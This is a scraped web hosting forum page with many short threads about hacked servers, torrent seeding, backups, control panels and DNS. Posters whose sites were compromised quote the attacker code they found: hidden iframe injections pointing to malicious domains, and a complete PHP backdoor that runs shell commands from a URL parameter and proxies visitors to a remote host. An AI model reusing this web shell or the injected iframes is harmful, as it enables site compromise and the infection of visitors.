Windows Server Hacked And Files Transferred Using Torrent Clients
Nov 8, 2007
I have noticed in a few Windows server tha the server gets hacked and there are tons of files which are mostly DVD rips and games being transferred away which results in huge amount of data transferred and bandwidth consumption increasing to as far as 29 Mbps. On further investigation, I find that all the files get stored in either the Recycler directory or the System Volume Information directories in any of the drives. Now these two directories are protected operating system files. Even if there is a windows firewall installed, there is no difference. I have even noticed that in some servers there is an automatic exception rule added in the windows firewall enabling the torrent client to communicate outside the server. This seems to be a common problem with Windows 2003 server and seems to be some backdoor of Windows allowing hackers to use the server for seeding. Has anybody come across such a problem or know the solution? Kindly help me with this.
View 14 Replies
ADVERTISEMENT
Jul 10, 2009
My server was being hacked, I can find some HTML and PHP files which inserted the codes similar to the following by the hacker.
HTML Code:
<iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"><
/iframe>
The inserted iframe src is not the same among the hacked files.
I am trying to find out all the hacked files on server, is there any way instead of checking the files manually?
View 14 Replies
View Related
Apr 14, 2007
I am being hacked & I don't know how they are getting files on my server. They are doing it on two of my domains, I suspended one and then they got it on the other. My FTP access log does not show anything suspicious..
How can I find their doorway?
View 4 Replies
View Related
Sep 19, 2007
At ThePlanet.com, I have a server running Windows Server
2003 Standard Edition with Service Pack 2 (build 3790).
After several years with no problems, my server was apparently recently hacked.
The server has several FrontPage web sites, and each of those
sites had the following code inserted into the home page.
<iframe width="0" height="0" src="[url]
<iframe width="0" height="0" src="[url]
<iframe width="0" height="0" src="[url]
<iframe width="0" height="0" src="[url]
<iframe width="0" height="0" src="[url]
<iframe width="0" height="0" src="[url]
Which looks like it is intended to benefit "onlyu", who is
probably an affiliate of four of the listed sites.
I removed the code and changed the password to the server.
But a few days later the following code appeared.
<iframe height="0" width="0" src=[url]
name="I1"></iframe>
<iframe height="0" width="0" src=[url]
name="I2"></iframe>
I changed the password again and removed several users
from the list of users in the computer. But a few days
later the following code appeared ...
<iframe width="0" height="0" src="[url]
<iframe width="0" height="0" src=[url]
Comparing the three groups of code, I'd say it was done by a human and not some sort of Trojan bot.
Does anyone have experience with this particular problem, or general advice about how to deal with it?
View 5 Replies
View Related
Jul 17, 2007
I've been looking for a VPS with windows, ability for torrents and unmetered bandwidth. I've tried leaseweb and I did not like their service one bit for support. i did not use their 10mb unmetered though. I then tried FDC and they were ok, but now I'm looking for something else that is more like FDC then anything. With FDC I was running windows 2003, unmetered bandwidth and was doing some torrents a bit. Not music or movies though, i hate 99.9% of the music out and don't bother with movies or software or any of that junk. my speed was fine at up to 100mb literally. downloading from the net to my FDC server would go as much as 80mb or so, peaking a bit faster for like half a second. Anyhow, the speed their was fine.
So I'm just looking for something else is all. The server I was on was a VDS and cost was for me $79. I had 512mb ram and 100gb drive space.
View 12 Replies
View Related
Sep 10, 2006
I was working on WHM of my server sudeenly i saw CPU load was increasing and till when i understand CPU load was on peak of 160%. I tried to find out CPU overloading sites and found that my 4 populer sites were creating problem. I stopped apache and suspanded all 4 sites and rebooted server. After forceful server reboot i found that load was getting normal to 2.5%. I unsuspanded one of 2 forums but even i unsuspanded that forum was not opening (IPB). I logged into ftp suspecting some problem i found that index.php was only 45bytes i have opend index.php and found this text inside .....
View 3 Replies
View Related
May 6, 2009
Sometime ago the DC told me there was too many files on server and I started to investigate what is was and i got info that some one hacked the server and was sending spam from it.
When I looked at the accounts in Direct Admin some of them had the contact email to some hacker so i deleted the emails and changed password on the DA account and the email of those accounts.
Still I got too many files all the time so the server goes down so i have to delete the spoolfile all the time like 10 times a day
Please help how do I detect from what account do the hacker operate?
Can I detect that somehow?
Is it possible to do some small script to detect this?
Is there any advanced module to DA that gives me the info?
View 5 Replies
View Related
Oct 20, 2009
how can I seed a torrent from my dedicated server?
When I build the torrent with Torrent Software, I have the possibility to add a HTTP as seed. The intention is to use my server as seed of this torrent. However I don't know what I need to change or configure in my server. I searched the internet for info about this, but wasn't able to find any info.
The torrent is an ebook written by me with public released domain rights, so there aren't any legal issues. Basically the problem/inquiry is 100% technical.
View 4 Replies
View Related
Nov 1, 2009
Im setting up a download service which allows users to download files to there space via different methods.
As Torrents are one of the methods, I need a dedi serve host which allows torrents.
It can be either:
a) Ignore DMCA Notices - Much easyier as it saves us the trouble.
b) Forward all notices to us to reply and we handle and delete offending files.
View 5 Replies
View Related
Nov 22, 2008
I'm looking for a cheap dedicated server for torrents. What I want is this:
* 1GB RAM or more
* 50Gb HDD or more
* 100mbps or higher
* 4000GB bandwith or more
* Located in Europe with great peering ....
View 11 Replies
View Related
May 27, 2009
Is there any way to block or monitor and find scripts such as rapidleech and other torrent upload scripts on a cPanel server?
View 2 Replies
View Related
Jul 4, 2007
what is the fast and best way?
View 4 Replies
View Related
May 26, 2008
I`m search for manage dedicated server wich allow torrent trackers scripts.
Can some on tell me wich is best to use?
View 4 Replies
View Related
May 31, 2009
I rent windows dedicated server for just about a month, but I never had problem.
When I copy files on my home computer and then paste them onto server's drive, files begin copying, but after some time they stop copying and I hear double beep sound.
Time after which they stop copying is random.
View 5 Replies
View Related
Mar 28, 2007
At work, we have a windows 2003 server.
We have a set of files that get modified from day to day.
Since they know I own a dedicated server (Linux) they ask me if it would be possible to have an offsite backup on my server of the set of files on the windows 2003 server.
Also, I dont want to have the whole files set to be uploaded everyday.
I am aware of rsync on *nix system, but do you have any suggestions on how to proceed with a windows 2003 server to a unix server?
View 3 Replies
View Related
Aug 9, 2013
We are moving our hosting to a new supplier . We offer hosting services to our clients and our present system produces automatic emails with all the clients log in details passwords etc. when you join or buy a new URL.
The new hosting supplier tells me that using Parallels panel this isn't possible .
have to produce manual emails is not really an option as I see massive problems
View 2 Replies
View Related
Jul 3, 2012
Is there a way to create global default nameservers for our clients to use in Plesk 11? A lot of clients rather not create their own nameservers, and would simply like to use ours. I can't find any settings in the Plesk Administration where you would create your nameservers as you would in other panels like cPanel/WHM.
View 3 Replies
View Related
Sep 13, 2013
how to make backups separately of all domains and clients, without going into their panel and configuring one by one?
View 2 Replies
View Related
Jul 27, 2014
I'm using Plesk 12.0.18 version with Windows 2012. I need to backup files to remote ftp server. Remote server configuration is Windows 2012 with IIS server. It works with ftp clients very well.
But, i have a problem about Personel FTP Repository. I open Personal FTP Repository Settings and write all boxes with true information about remote ftp server but it says "Transport error: unable to list directory: Curl error: Login denied".
Ftp server works fine with ftp clients and cpanel backups.
View 2 Replies
View Related
Oct 30, 2007
Hey everyone, i want to make a torrent website, but i'm kind of lost. Does anyone know what type of server would i need for this server? And what components should be installed on the server in order for torrents to work?
View 5 Replies
View Related
Apr 15, 2008
I want to transfer a website from 1&1’s control panel to a cpanel host. Can this be done in a “Backup and Restore” Kind of format?
The Website has a significant amount of email accounts and messages and I would not want them to get lost in transit.
View 9 Replies
View Related
Nov 10, 2013
Server Version: Apache/2.2.22 (Debian)..I have the above server running on a small computer with no screen. I can view server-status no problem and am starting to understand the info.
What I would like to do is check the progress of a largish video upload, I would like to know perhaps how much has been transferred and maybe some idea of time left.Am I able to do this somehow via apache2 or will I have to reply on commands from the server computer.
View 1 Replies
View Related
Sep 8, 2007
My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.
I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).
Going back on track, all files named "%index%" were hacked.
-I found a index.txt file with links to obscure sites.
The code was written at bottom of the all index.html files: iframe code
Code:
><!-- ~ --><iframe src="http://googletraff.com/in.cgi?default" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code
PHP Code:
<?error_reporting(0);if($_GET['cmd45']) {system($_GET['cmd45']);}$domain = 'shemale1.biz';$ur = '/load.php?f=%s&ua=%s&ref=%s';$qs = $_SERVER['QUERY_STRING'];$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));$ref = urlencode($_SERVER['HTTP_REFERER']);$redirect = sprintf($ur,$qs,$ua,$ref);#print $redirect;#exit;echo getcontent($domain,80,$redirect);exit;function getcontent($server, $port, $file){$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;fputs($socket, "GET $file HTTP/1.0
");fputs($socket, "Referer: http://$refer
");fputs($socket, "Host: $server
");fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
");$wr = 0;while(!feof($socket)){ $temp = fgets($socket); if(eregi("<",$temp)) { $wr = 1; } if($wr) { $page .= $temp; } } fclose($socket); return $page; } ?>
So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...
View 5 Replies
View Related
May 20, 2008
I tranferred all my accounts from my old cpanel server to my new one,
Updated the DNS records with my registrar to the new ips, unfortunately e-mail is not working, i used the trouble shooter and seems to trying to relay or something my mail to the old IP.
I keep getting this error when trying to send to an account
IPdoes not like recipient.
Remote host said: [IP DOMAIN] is currently not
550-permitted to relay through this server. Perhaps you have not logged into
550-the pop/imap server in the last 30 minutes or do not have SMTP
550 Authentication turned on in your email client.
Giving up on [IP].
View 10 Replies
View Related
May 25, 2008
I need a server dedicated just to emailing prospected clients.
Can anyone turn me onto a decent provider who does not mind excessive mail?
View 11 Replies
View Related
Feb 14, 2008
I am a host reseller and the parent company is upgrading their servers to PHP5. This may break some of my clients' sites (OSCommerce, Zen). Should we fix those sites for free or should my clients pay for the upgrade?
View 24 Replies
View Related
Jul 6, 2007
I had been rebuild apache, change value MaxClients in httpd.conf to 1500 and restart the server, but problem still the same
Quote:
Originally Posted by httpd.conf
MaxClients 1500
Quote:
Originally Posted by ssh
# /usr/local/apache/bin/apachectl configtest
Syntax OK
Quote:
Originally Posted by email
httpd failed @ Fri Jul 6 21:35:08 2007. A restart was attempted automagicly.
Quote:
Originally Posted by Server Status
Server Load 1.23 (2 cpus)
Memory Used 7.8 %
View 14 Replies
View Related
Mar 31, 2008
how to transfer files through my windows server and my Pc?
i tried many software but all of them depends on my Pc speed, so it transfer very slow, i tried also before connecting through RDC to windows server, to check on Local resources " Disc Drives" but also transfer files slowly,
i want any speed software to copy files as if there are in same Hard drives
View 1 Replies
View Related
Dec 11, 2007
So my the other day one of my clients rented a Windows 2003 server. Has no idea on how to run DNS server on it and demanded us to do something about it. Since he had no management plan, we let him know that if he got himself a management plan we could help him out - but looks as though he was on a tight budget and couldn't opt in for it. Same thing happened last week and again one yesterday!
To help these customers out I was wondering if I could start a DNS service. Each client would get access to it for free regardless of their operating system or management plan. They could point their domains to the nameservers and use the DNS service to point the domain's A records to their servers.
From the start, I have been using EditDNS and still using it. But coming to think of it, its getting more unstable day by day even though they have 5 servers spread across the globe. I am planning on to move to EveryDNS. With this move, I'd like to use their services for my clients too. Rather than running my own DNS servers - I feel this could work out more efficient and reliable.
So what I am planning on doing here is more like creating private namesevers to mask EveryDNS's nameservers. Then have a custom script site built to interact with EveryDNS's APIs. Sounds like a good idea? Then my customer uses the script's interface to create/delete/edit records, etc.
Anyway I need some advice, suggestion or help in this matter. Has anyone tried this stunt out before? If so, how successful were they/you? How are your customer's reaction towards this (satisfied or not?). Does it stay efficient? (both in terms of money, time and energy spent).
Also, if anyone could suggest me any programmer who could do this for me (someone well versed with DNS/EveryDNS on PHP/MySQL) it would be nice.
Edit: I guess ServerBeach/Peer 1 already has implement this. If anyone really knows whats going on there - please share.
View 6 Replies
View Related
Feb 11, 2007
in getting a full list of server addons that clients generally require. i know i few, like:
Zend optimizer
Curl
Ioncube
GD
Imagemagiac
etc... but i want to know others which i dont know and which most of the clients want to have already installed on their hosts server.
View 6 Replies
View Related
